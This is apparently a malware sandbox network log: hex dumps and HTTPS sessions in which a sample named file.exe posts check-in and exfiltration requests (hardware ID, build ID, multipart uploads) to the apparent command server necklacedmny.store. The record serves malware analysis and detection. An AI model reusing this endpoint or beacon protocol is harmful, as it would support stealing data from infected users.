Oct 29, 2024 06:59:23.935913086 CET	1236	IN	Data Raw: 1f 70 3f 41 f7 cd 40 06 80 bc 3e 7e 70 f2 9b 30 1c 09 a6 20 dd a7 92 e0 ab 82 74 ff 45 07 05 16 d8 f4 ea a4 41 e5 c5 60 28 3d 7c 36 51 ab 30 01 8d 83 60 30 c9 76 33 fc 7e a5 3d fa 8e 7b f7 12 91 6e 50 40 f7 79 4c 58 db 92 5f f6 6c 8c 3d 91 b9 55 Data Ascii: p?A@>~p0 tEA`(=\|6Q0`0v3~={nP@yLX_l=UN%7{%vNGGft-xq5pPEbQm;yyI,gXu4akl(NDTevitsVpwqn{8B.}- eGx6GXFR$e;AglG}n1J
Oct 29, 2024 06:59:23.935930014 CET	1236	IN	Data Raw: 0b 71 56 56 33 71 5a 22 1c 5c df 36 76 94 54 af bd 9c 50 3a ef a7 72 1f ad f9 7a 46 93 b4 4a 41 bd 9c 8a 20 1f d4 8e 43 24 67 cc be 93 71 96 40 bd d0 56 6e ef b8 a6 34 e1 0d b1 7a bb 94 b2 17 ed 95 ea 9a 76 f0 43 c8 93 f4 62 41 fd 85 ca 8e 05 2c Data Ascii: qVV3qZ"\6vTP:rzFJA C$gq@Vn4zvCbA,b8=qQ e(1~?mGfQ?!VC[Hjv2"0*IXpt?,@)m#{1dA\|.qP{hH<v'^x4Kj8!>K
Oct 29, 2024 06:59:23.935944080 CET	1236	IN	Data Raw: d4 8e 4f 47 e9 ac 56 13 d0 d9 06 41 88 58 46 b5 82 67 58 6e c3 81 7a e7 77 ca 85 5f e2 4c ac e4 d9 99 84 71 81 ed 78 05 0e cb 2b 14 9d 86 8b d7 cd 74 aa 50 73 d7 c7 62 8d 64 b4 62 de c7 a6 9b 05 81 a2 2f 8f cb 9a 49 84 3e eb 41 fb 21 70 92 40 5a Data Ascii: OGVAXFgXnzw_Lqx+tPsbdb/I>A!p@ZkJC#~;QD;tj~9\|P^hk*AC([}~5Sv/~~}Qf\|a2=&iw,PO=q! ?XG#Asv$fDTl/=f<[RJ
Oct 29, 2024 06:59:23.941088915 CET	1120	IN	Data Raw: 7b b9 1f eb a5 88 35 1a a1 0c 3c 05 5a 68 78 21 71 81 44 81 71 88 96 0e 6e 9e 22 67 74 79 21 32 71 78 9c 4c be 85 e8 d3 f0 4d 32 78 d2 37 54 af bc 32 af 45 d4 d6 5e fe bc 66 48 55 db c5 a2 4c 6b d3 a0 43 e1 c7 97 ef 3d 91 41 d1 2d db a5 83 dd 4c Data Ascii: {5<Zhx!qDqn"gty!2qxLM2x7T2E^fHULkC=A-Lkoo;9yED&kXl0eV4fg+7+tkc/'k1(eDwRRun9/40924$^kojwF)R[O^WmR@qj?4K!rmvN^cUE

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: necklacedmny.store
2024-10-29 05:59:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-29 05:59:09 UTC	1013	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6k6204l3p2jmaath211nuofgek; expires=Fri, 21 Feb 2025 23:45:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AbeK4Lgfl45fQ8BwoybIgqIA2DCRYne5hG8s0P1Ib%2BI54sUPw%2FNMtG19wepHKtOBsf5qohBuQSnECOsexJTnBgDijp1tDkJ453c0RuO1zhPlbLIFlDMNa%2FLmOMnXNZXvtYEl2Zk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f01bdedbe847-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2068571&cwnd=251&unsent_bytes=0&cid=d7bf1cc726f56377&ts=621&x=0"
2024-10-29 05:59:09 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-29 05:59:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:10 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: necklacedmny.store
2024-10-29 05:59:10 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-29 05:59:11 UTC	1023	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ep8jgafe85iuk9t833u7j85303; expires=Fri, 21 Feb 2025 23:45:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWi8Nz0ZShSZpC%2F%2FNfmbmR0FkldW3%2F6bw6FpSi%2B0eLkeqp6AdqZJa0Iqaa2bPOL0HplTRY9pdwZS%2FDqwRWT27YimO25vlYuik5mUrW%2FAQGeMRQEpnfVgx1Jw%2FHYVt3st%2BJ9FBu0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f0235aca0c17-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1153&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=5c970650b57dcfd4&ts=500&x=0"
2024-10-29 05:59:11 UTC	346	IN	Data Raw: 34 65 63 0d 0a 6d 69 52 6b 50 77 4e 38 49 47 51 32 6e 61 35 62 69 6c 54 73 52 4c 6f 44 48 46 56 77 64 57 70 69 66 51 49 4b 41 2f 37 68 4a 50 7a 68 42 68 49 64 4f 55 67 4d 52 6b 58 34 6a 47 48 2b 4a 70 6b 68 6c 69 46 39 4d 56 4a 50 44 41 4d 52 63 57 38 76 33 4a 64 4a 33 71 42 43 42 56 4e 77 47 51 78 47 55 2b 57 4d 59 64 45 76 7a 69 48 55 49 53 5a 33 46 52 38 49 41 78 46 67 61 32 69 52 6b 55 69 66 38 6b 67 44 56 32 59 66 52 41 56 61 38 4d 73 2b 37 7a 57 47 4b 74 4e 75 64 44 68 53 57 55 67 48 42 79 41 77 49 62 4f 45 55 4a 33 58 52 52 64 55 49 51 45 4d 48 78 54 34 77 48 6d 77 64 6f 30 68 32 47 39 36 4d 52 73 64 41 67 6f 5a 59 57 35 70 6a 6f 68 43 6c 50 4a 47 41 46 5a 73 46 6c 41 49 55 50 66 41 4f 4f 55 31 7a 6d 69 59 5a 6d 5a 33 53 6c 64 62 4d 68 78 78 65 58 Data Ascii: 4ecmiRkPwN8IGQ2na5bilTsRLoDHFVwdWpifQIKA/7hJPzhBhIdOUgMRkX4jGH+JpkhliF9MVJPDAMRcW8v3JdJ3qBCBVNwGQxGU+WMYdEvziHUISZ3FR8IAxFga2iRkUif8kgDV2YfRAVa8Ms+7zWGKtNudDhSWUgHByAwIbOEUJ3XRRdUIQEMHxT4wHmwdo0h2G96MRsdAgoZYW5pjohClPJGAFZsFlAIUPfAOOU1zmiYZmZ3SldbMhxxeX
2024-10-29 05:59:11 UTC	921	IN	Data Raw: 71 41 47 41 46 4e 67 45 30 49 55 58 50 54 48 50 50 6f 39 68 79 76 56 59 58 4d 39 48 52 51 49 42 78 56 71 5a 32 75 59 6a 6b 75 59 2b 45 5a 47 45 79 45 5a 57 6b 59 4d 76 2b 38 38 2b 44 47 43 4d 4a 70 62 50 69 68 63 44 6b 67 48 45 79 41 77 49 5a 53 47 52 5a 33 7a 53 51 56 56 61 67 78 43 46 46 4c 79 79 53 76 75 4d 34 41 73 32 33 4e 30 4f 52 51 55 41 51 73 57 5a 57 39 6c 33 4d 30 47 6d 65 41 47 58 68 31 41 45 30 6b 4b 58 75 6a 4d 65 66 64 34 6c 32 62 66 62 54 35 76 55 68 4d 4a 42 42 35 6b 5a 6d 2b 59 6a 30 43 51 39 55 6b 41 56 32 45 5a 53 41 35 63 2f 73 45 79 35 7a 61 4c 4b 39 78 6e 63 6a 59 58 56 30 5a 41 47 48 67 6f 4f 64 79 74 51 5a 33 71 42 44 4e 65 62 78 42 46 45 42 54 67 67 69 43 6f 4d 59 4a 6d 67 43 46 77 4d 68 30 46 43 52 49 61 62 6e 70 74 6d 59 56 4c Data Ascii: qAGAFNgE0IUXPTHPPo9hyvVYXM9HRQIBxVqZ2uYjkuY+EZGEyEZWkYMv+88+DGCMJpbPihcDkgHEyAwIZSGRZ3zSQVVagxCFFLyySvuM4As23N0ORQUAQsWZW9l3M0GmeAGXh1AE0kKXujMefd4l2bfbT5vUhMJBB5kZm+Yj0CQ9UkAV2EZSA5c/sEy5zaLK9xncjYXV0ZAGHgoOdytQZ3qBDNebxBFEBTggiCoMYJmgCFwMh0FCRIabnptmYVL
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 31 38 62 65 0d 0a 5a 48 41 37 46 78 67 49 41 52 35 75 59 6d 72 63 7a 51 61 5a 34 41 5a 65 48 55 34 54 55 68 52 65 39 4e 31 37 33 54 57 41 4b 4e 39 33 50 69 68 63 44 6b 67 48 45 79 41 77 49 5a 65 46 53 70 4c 34 51 42 52 54 62 67 78 49 46 46 44 78 79 44 58 6d 50 34 4d 70 33 58 4e 36 4e 77 41 57 44 51 63 52 62 58 70 6b 33 4d 30 47 6d 65 41 47 58 68 31 62 4b 6b 55 57 52 66 69 4f 44 4f 73 34 67 43 48 4f 49 57 46 35 43 31 63 50 44 46 38 34 4b 47 4b 51 6a 6b 2b 62 39 31 51 4d 55 57 41 4d 52 51 39 64 39 63 30 33 35 7a 32 43 49 38 70 71 63 54 38 64 46 67 55 4e 46 47 52 6f 49 64 4c 44 51 59 61 34 48 6b 5a 38 62 42 46 51 42 55 57 39 2b 54 72 6d 4f 49 6b 77 6d 48 34 77 4c 6c 49 51 42 45 42 48 49 47 6c 74 6b 49 4a 4a 6d 50 4a 4f 42 56 78 7a 46 30 30 4f 57 2f 62 4e 4f Data Ascii: 18beZHA7FxgIAR5uYmrczQaZ4AZeHU4TUhRe9N173TWAKN93PihcDkgHEyAwIZeFSpL4QBRTbgxIFFDxyDXmP4Mp3XN6NwAWDQcRbXpk3M0GmeAGXh1bKkUWRfiODOs4gCHOIWF5C1cPDF84KGKQjk+b91QMUWAMRQ9d9c035z2CI8pqcT8dFgUNFGRoIdLDQYa4HkZ8bBFQBUW9+TrmOIkwmH4wLlIQBEBHIGltkIJJmPJOBVxzF00OW/bNO
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 71 33 33 4e 7a 4d 68 6f 64 41 51 55 54 62 57 74 7a 6e 34 49 47 30 4c 68 42 48 68 30 35 58 6d 55 31 59 39 79 4d 4a 71 59 76 7a 69 48 55 49 53 5a 33 45 78 38 50 44 68 74 79 5a 6e 4f 53 68 45 61 59 38 45 34 42 55 57 38 51 55 41 35 56 2f 38 49 32 34 44 2b 4b 4a 39 78 6c 63 6a 42 53 57 55 67 48 42 79 41 77 49 62 53 41 58 49 53 36 61 41 31 64 5a 67 35 55 48 52 54 67 67 69 43 6f 4d 59 4a 6d 67 43 46 36 50 42 67 65 43 77 6b 62 62 57 68 6f 6b 34 70 4f 6b 2f 42 55 42 31 64 7a 47 6b 63 48 57 2f 58 49 4d 65 51 35 67 69 4c 4b 61 6a 35 35 55 68 41 51 51 45 63 67 53 47 71 4b 6f 46 53 4d 75 46 6c 49 52 43 45 5a 54 6b 59 4d 76 38 55 31 36 54 65 45 49 4e 4e 6b 63 7a 63 58 48 51 38 4d 48 32 42 72 5a 35 71 4f 54 70 62 30 53 67 56 51 5a 42 70 51 46 46 44 33 6a 48 65 6f 4d 5a Data Ascii: q33NzMhodAQUTbWtzn4IG0LhBHh05XmU1Y9yMJqYvziHUISZ3Ex8PDhtyZnOShEaY8E4BUW8QUA5V/8I24D+KJ9xlcjBSWUgHByAwIbSAXIS6aA1dZg5UHRTggiCoMYJmgCF6PBgeCwkbbWhok4pOk/BUB1dzGkcHW/XIMeQ5giLKaj55UhAQQEcgSGqKoFSMuFlIRCEZTkYMv8U16TeEINNkczcXHQ8MH2BrZ5qOTpb0SgVQZBpQFFD3jHeoMZ
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 5a 6e 64 4b 56 79 38 61 45 6d 5a 2f 63 4b 6d 45 52 73 2b 34 57 55 68 45 49 52 6c 4f 52 67 79 2f 77 54 58 69 4f 34 73 69 30 47 5a 39 4e 68 34 54 42 51 30 62 61 57 78 6b 6a 70 46 41 6b 50 68 4a 43 46 4a 74 44 45 77 44 56 50 4f 4d 64 36 67 78 6c 6d 61 41 49 55 38 67 45 6c 63 58 54 67 59 67 62 32 33 63 32 77 61 52 39 56 51 4b 55 6d 45 66 51 51 4a 66 2b 4d 6f 2f 36 54 57 4c 4a 64 31 6e 66 7a 63 65 48 51 38 49 46 57 35 6c 5a 35 69 46 51 4e 36 32 42 67 46 46 49 55 59 43 4e 46 6e 78 78 54 72 75 4f 35 67 4f 36 53 46 68 65 51 74 58 44 77 78 66 4f 43 68 6c 6c 34 74 4b 6d 2f 42 44 42 31 56 72 46 6b 30 4a 52 76 37 44 4d 4f 38 39 67 79 6e 57 5a 48 41 6c 46 52 77 44 43 42 5a 75 62 69 48 53 77 30 47 47 75 42 35 47 61 32 49 51 53 52 64 62 2f 4d 42 35 39 33 69 58 5a 74 39 Data Ascii: ZndKVy8aEmZ/cKmERs+4WUhEIRlORgy/wTXiO4si0GZ9Nh4TBQ0baWxkjpFAkPhJCFJtDEwDVPOMd6gxlmaAIU8gElcXTgYgb23c2waR9VQKUmEfQQJf+Mo/6TWLJd1nfzceHQ8IFW5lZ5iFQN62BgFFIUYCNFnxxTruO5gO6SFheQtXDwxfOChll4tKm/BDB1VrFk0JRv7DMO89gynWZHAlFRwDCBZubiHSw0GGuB5Ga2IQSRdb/MB593iXZt9
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 6c 63 35 46 68 68 6e 5a 79 4f 31 68 46 32 66 38 6b 55 4e 55 53 45 42 44 42 38 55 2b 4d 42 35 73 48 61 44 4b 74 56 6c 62 44 73 53 46 77 45 48 46 58 4a 6e 62 70 47 41 52 70 76 71 52 78 52 53 61 68 74 42 41 6c 76 77 77 44 48 69 64 73 42 6d 33 33 6b 2b 62 31 49 37 43 78 45 56 49 6b 39 37 69 6f 52 4b 6a 2f 4e 4c 43 68 31 2b 55 46 74 47 55 2f 4f 4d 59 61 67 32 6a 79 76 4b 5a 48 38 39 47 42 6f 41 44 78 70 6c 5a 32 57 59 69 45 69 4d 39 6b 6b 47 57 32 6f 66 52 77 56 66 39 63 49 77 2b 6e 62 41 5a 74 39 35 50 6d 39 53 50 52 4d 42 45 6d 77 71 54 35 65 56 51 64 7a 5a 53 41 31 61 62 51 67 43 47 52 72 6d 6a 44 37 6b 64 74 5a 6d 30 57 39 79 4e 42 55 66 41 41 55 66 61 32 68 75 6c 6f 31 42 6a 50 4a 4b 44 45 39 75 48 55 38 43 57 66 58 4a 4d 50 6f 7a 68 79 43 59 4c 7a 34 77 Data Ascii: lc5FhhnZyO1hF2f8kUNUSEBDB8U+MB5sHaDKtVlbDsSFwEHFXJnbpGARpvqRxRSahtBAlvwwDHidsBm33k+b1I7CxEVIk97ioRKj/NLCh1+UFtGU/OMYag2jyvKZH89GBoADxplZ2WYiEiM9kkGW2ofRwVf9cIw+nbAZt95Pm9SPRMBEmwqT5eVQdzZSA1abQgCGRrmjD7kdtZm0W9yNBUfAAUfa2hulo1BjPJKDE9uHU8CWfXJMPozhyCYLz4w
2024-10-29 05:59:11 UTC	866	IN	Data Raw: 34 51 62 57 64 6d 6c 34 78 4d 6b 4f 70 4a 41 31 56 74 46 6b 38 55 58 76 58 65 4d 4f 45 37 67 43 37 4b 59 6a 35 35 55 68 41 51 51 45 63 67 57 6d 75 66 6a 31 43 54 39 77 59 5a 45 33 68 65 52 51 6f 55 70 34 77 72 2b 6a 61 46 4a 74 39 76 62 44 59 61 47 41 49 41 47 57 74 69 59 70 57 48 53 4a 66 2b 52 77 74 63 59 42 35 48 42 6c 33 74 77 58 6d 6d 64 6f 6b 2b 6d 44 6b 2b 41 42 34 63 4f 51 4d 4a 49 48 63 76 68 63 4e 42 6b 72 67 65 52 6c 78 7a 45 30 6f 43 56 50 4c 4b 4d 75 6b 33 6a 53 62 59 59 6e 34 79 47 52 67 4f 42 78 4a 71 59 57 69 4f 69 30 4b 4d 2b 45 6f 43 48 53 39 65 52 52 34 55 70 34 77 4a 36 7a 32 43 4a 74 56 30 50 69 68 63 44 6b 67 48 45 79 41 77 49 5a 53 49 54 5a 6a 7a 52 51 56 54 61 68 52 4e 43 56 37 35 79 6a 48 74 4e 6f 49 6d 33 57 64 36 4d 78 77 51 42 Data Ascii: 4QbWdml4xMkOpJA1VtFk8UXvXeMOE7gC7KYj55UhAQQEcgWmufj1CT9wYZE3heRQoUp4wr+jaFJt9vbDYaGAIAGWtiYpWHSJf+RwtcYB5HBl3twXmmdok+mDk+AB4cOQMJIHcvhcNBkrgeRlxzE0oCVPLKMuk3jSbYYn4yGRgOBxJqYWiOi0KM+EoCHS9eRR4Up4wJ6z2CJtV0PihcDkgHEyAwIZSITZjzRQVTahRNCV75yjHtNoIm3Wd6MxwQB
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 31 30 35 32 0d 0a 2f 75 53 78 5a 65 5a 42 6c 38 4f 46 72 34 32 44 37 6d 4d 49 35 6d 6c 69 46 78 64 30 6f 75 53 45 68 66 58 79 59 68 68 4d 4d 65 33 73 31 46 43 46 4e 6d 43 46 4e 4c 64 2b 6e 42 4e 75 4d 33 7a 6d 69 59 5a 7a 35 76 51 6c 6c 49 42 41 34 67 4d 44 48 4f 32 42 50 4e 72 78 5a 55 51 69 38 48 41 68 41 55 70 35 35 33 71 43 54 4f 66 70 67 6d 63 44 6f 54 46 41 59 44 44 58 4a 75 59 6f 71 41 41 61 44 47 5a 77 74 57 62 52 4e 4e 44 57 72 42 37 54 54 6a 4f 6f 4d 70 30 31 39 41 49 68 45 5a 42 67 63 4a 63 53 67 76 33 49 77 47 78 73 45 47 54 68 31 65 55 41 49 65 46 4b 65 4d 44 4f 73 34 67 43 48 4f 63 44 4d 57 48 78 77 45 44 52 42 72 4b 43 2f 63 68 51 62 47 71 41 68 47 57 58 42 65 47 6c 59 47 70 4a 6c 71 76 32 62 63 4f 5a 5a 34 50 69 46 53 54 31 70 4f 58 33 49 Data Ascii: 1052/uSxZeZBl8OFr42D7mMI5mliFxd0ouSEhfXyYhhMMe3s1FCFNmCFNLd+nBNuM3zmiYZz5vQllIBA4gMDHO2BPNrxZUQi8HAhAUp553qCTOfpgmcDoTFAYDDXJuYoqAAaDGZwtWbRNNDWrB7TTjOoMp019AIhEZBgcJcSgv3IwGxsEGTh1eUAIeFKeMDOs4gCHOcDMWHxwEDRBrKC/chQbGqAhGWXBeGlYGpJlqv2bcOZZ4PiFST1pOX3I
2024-10-29 05:59:11 UTC	1369	IN	Data Raw: 77 37 65 78 77 68 47 52 53 46 47 41 6a 4e 58 38 63 49 2b 2f 69 66 44 41 38 39 69 62 6a 45 52 56 30 5a 41 47 53 41 77 4d 64 4c 44 51 6f 2b 34 48 6c 59 50 4f 6b 73 52 55 51 53 74 30 33 66 78 64 70 68 6d 67 44 4d 77 64 77 42 58 55 45 42 59 59 33 70 7a 6d 6f 42 51 6e 62 39 34 4f 48 74 69 44 30 67 6e 57 65 2f 4c 42 39 59 6a 6a 53 6a 57 5a 6d 67 6d 55 6c 6c 49 44 31 38 34 55 53 48 55 7a 30 43 64 37 67 59 35 45 79 45 47 41 6c 34 55 79 73 38 33 35 6a 47 59 4e 35 56 48 66 53 59 59 4e 67 55 51 47 43 41 6d 49 5a 72 44 48 73 32 32 42 67 4a 4d 49 55 59 53 56 41 2b 71 6e 32 36 34 5a 4a 46 6f 77 53 46 6f 64 30 70 46 52 6b 41 4e 49 44 41 68 32 34 42 55 6a 50 35 46 45 46 34 6d 49 48 77 7a 56 2f 48 43 50 76 34 44 6a 54 66 62 59 58 55 4a 4c 44 59 47 43 78 68 73 66 6c 2b 69 Data Ascii: w7exwhGRSFGAjNX8cI+/ifDA89ibjERV0ZAGSAwMdLDQo+4HlYPOksRUQSt03fxdphmgDMwdwBXUEBYY3pzmoBQnb94OHtiD0gnWe/LB9YjjSjWZmgmUllID184USHUz0Cd7gY5EyEGAl4Uys835jGYN5VHfSYYNgUQGCAmIZrDHs22BgJMIUYSVA+qn264ZJFowSFod0pFRkANIDAh24BUjP5FEF4mIHwzV/HCPv4DjTfbYXUJLDYGCxhsfl+i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49713	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:12 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12864 Host: necklacedmny.store
2024-10-29 05:59:12 UTC	12864	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"43D6027EFDEE038689D78D31827A7048--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 05:59:12 UTC	1018	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dp1aj83ruemca0gqjk9t5kgaab; expires=Fri, 21 Feb 2025 23:45:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFGai1xg3gSDYcjSTbJHbD5Ww3F8v8kJqNlWK8pRj1xcTVRFcbVqAmj636e1sM%2FCgLRoWEIcqPD9V82sUIrTpg1Ln05c5Ch%2FhyV%2B06OtydqKUkAnzQ5Ll7JeDtbN36r57Ss%2BquA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f02c9e79285f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13806&delivery_rate=1768009&cwnd=233&unsent_bytes=0&cid=6d17892a20552a4a&ts=604&x=0"
2024-10-29 05:59:12 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 05:59:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49714	188.114.96.3	443	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 05:59:13 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15110 Host: necklacedmny.store
2024-10-29 05:59:13 UTC	15110	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 44 36 30 32 37 45 46 44 45 45 30 33 38 36 38 39 44 37 38 44 33 31 38 32 37 41 37 30 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"43D6027EFDEE038689D78D31827A7048--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 05:59:13 UTC	1019	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 05:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=15lftfqs8pu7gaiviosel0pgab; expires=Fri, 21 Feb 2025 23:45:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lp211YLE2LxLs%2BEM%2BXkRRwrjoQ1EsZiywiV%2Br0BUXs2Tgn%2FnEUB0FrmTuskC8pjEZjWLM081VUAGo69rXSX2rsRoBPtJ409FIoR0JCaj23uuxTWe3sVyecsBMzX5Bs4f4EsDpSk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da0f034fefb475a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16052&delivery_rate=2413333&cwnd=251&unsent_bytes=0&cid=a4e1ea84f931fee3&ts=574&x=0"
2024-10-29 05:59:13 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 05:59:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

